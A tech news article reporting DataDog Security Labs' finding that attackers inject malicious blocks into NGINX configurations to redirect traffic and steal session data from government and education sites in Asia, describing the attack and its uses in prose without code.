- DataDog reports attackers hijacking NGINX configurations to redirect traffic through malicious infrastructure
- The campaign targets the government and education sectors in Asia and allows the theft of session tokens, cookies and credentials.
- Hijacked traffic used for phishing, malware injection, ad fraud, and additional proxy attacks.
Experts have warned that cybercriminals are targeting NGINX servers and diverting legitimate traffic through their malicious infrastructure.
Security researchers at DataDog Security Labs found that attackers primarily focus on Asian targets in the government and education industries.
NGINX servers are software systems that sit in front of websites or applications and handle incoming web traffic. They serve content, balance loads, and route requests to the appropriate backend servers.
What to do with stolen data
In the attack, anonymous threat actors modify NGINX configuration files and inject malicious blocks that capture incoming requests. They then rewrite them to include the original URL and forward the traffic to the domains under their control. According to DataDog, this is a five-stage attack that begins with a configuration injection and ends with data exfiltration.
Since no vulnerability is abused here and victims still end up on the pages they requested, no one notices. Still, cybercriminals get away with valuable information that can be used in different ways.
Because headers are persisted, the attacker can collect IP addresses, user agents, referrers, session tokens, cookies, and sometimes credentials or API keys if they appear in requests. On government or .edu sites, that data is especially valuable.
They can also manipulate content selectively. Since only certain URL paths are hijacked, the attacker can inject fake ads, phishing pages, malware downloads, or login requests only when desired, successfully targeting specific users, regions, or time zones.
Then, there is the option of monetizing and reselling traffic. Real, clean user traffic routed through the attacker’s infrastructure can be sold for ad fraud, SEO manipulation, click fraud, or used to power other malicious services, which is a common practice in large-scale proxy ecosystems.
Finally, compromised NGINX servers can be used to perform proxy attacks against other targets, effectively masking their origins.
Through beepcomputer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
